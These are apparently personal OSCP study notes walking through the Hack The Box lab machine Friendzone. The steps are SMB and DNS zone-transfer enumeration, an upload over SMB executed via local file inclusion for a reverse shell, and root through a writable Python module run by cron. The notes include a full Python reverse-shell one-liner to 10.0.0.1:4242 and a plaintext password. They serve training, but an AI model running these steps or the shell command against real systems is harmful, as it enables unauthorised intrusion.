O
O
OSCP Notes
Search…
HTB Friendzone #22
Nmap Result:
Not shown: 993 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a9:68:24:bc:97:1f:1e:54:a5:80:45:e7:4c:d9:aa:a0 (RSA)
| 256 e5:44:01:46:ee:7a:bb:7c:e9:1a:cb:14:99:9e:2b:8e (ECDSA)
|_ 256 00:4e:1a:4f:33:e8:a0:de:86:a6:e4:2a:5f:84:61:2b (ED25519)
53/tcp open domain ISC BIND 9.11.3-1ubuntu1.2 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.11.3-1ubuntu1.2-Ubuntu
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Friend Zone Escape software
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
443/tcp open ssl/http Apache httpd 2.4.29
|_ssl-date: TLS randomness does not represent time
|_http-server-header: Apache/2.4.29 (Ubuntu)
| tls-alpn:
|_ http/1.1
| ssl-cert: Subject: commonName=friendzone.red/organizationName=CODERED/stateOrProvinceName=CODERED/countryName=JO
| Not valid before: 2018-10-05T21:02:30
|_Not valid after: 2018-11-04T21:02:30
|_http-title: 404 Not Found
445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Service Info: Hosts: FRIENDZONE, 127.0.1.1; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: -39m59s, deviation: 1h09m16s, median: 0s
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: friendzone
| NetBIOS computer name: FRIENDZONE\x00
| Domain name: \x00
| FQDN: friendzone
|_ System time: 2022-02-22T05:02:00+02:00
| smb2-time:
| date: 2022-02-22T03:02:00
|_ start_date: N/A
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: FRIENDZONE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
21 enum:
53: zone?
SMb enum:
80 enum:
SMB Enum:
smbmap -H 10.129.1.225
Looks like we can read from general and Development.
smbmap -H 10.129.1.225 -R --depth 5
Running this will go in those directories and discover files.
smbclient //10.129.1.225/general
and download the file (get creds.txt)
creds.txt content
----

HTTPs

https://friendzone.red
/js/js
It's executing php code.
---
Let's try some zone transfer!
dig axfr @10.129.1.225 friendzone.red > zonetransfer
Now we've got more hosts:
now do the other host:
dig axfr @10.129.1.225 friendzoneportal.red >> zonetransfer
cat zonetransfer| grep friendzone | grep IN | awk '{print $1}'| sed 's/\.$//g'|sort -u
Command Explanation:
  • we are grepping the lines with the keywords "friendzone and IN"
  • awk is just printing up until the first space
  • sed 's/\.$//g' is replacing the ending period with nothing inside // has nothing. you place the first value in side the first "//" of what you want to replace and put something in the second one that you want to replace it with.
  • Syntax: sed 's/value1/value2/g'
now we've got more hosts
Used gedit to formatted the host names to https://hostname
Now use aquatone to see which hosts have actual content in a timely manner.
To use aquatone, you need to place the text file inside the same directory ---- /opt/aquatone
Interesting urls:
https://administrator1.friendzone.red login portal
https://admin.friendzoneportal.red : login portal
https://uploads.friendzone.red
We can also see the analysis by visiting the output html with firefox:
uploads.friendzone.red
https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=timestamp
We could try to upload a file in the development directory through SMB and execute it with LFI here?
test php
<?php
echo("Gorigorisensei Hacking your System.") ;
?>
Now it's uploaded it on Development.
Visiting the following link, we confirm, that it's working.
https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=/etc/Development/test
Adjusted the script with the php reverse shell.
Now we have a shell.
User credential found:
Agpyu12!0.213$
switched user.
root owned file found
Can't edit though.. .
This is running just the os module as a cron job.
Let's do LinPeas.
Writable file found: and it's an os file! If we edit this,it will be ran by the reporter python script!
Replaced the content with the reverse shell (removed os function)
This wasn't working so I used triple quotes around the code but this didn't work either
I used this instead:
python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4242));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'
I'm defnitely getting better at vi...but still not great at it:
vim commands I used today:
dd - erase a line
u - undo
i - insert
Copy link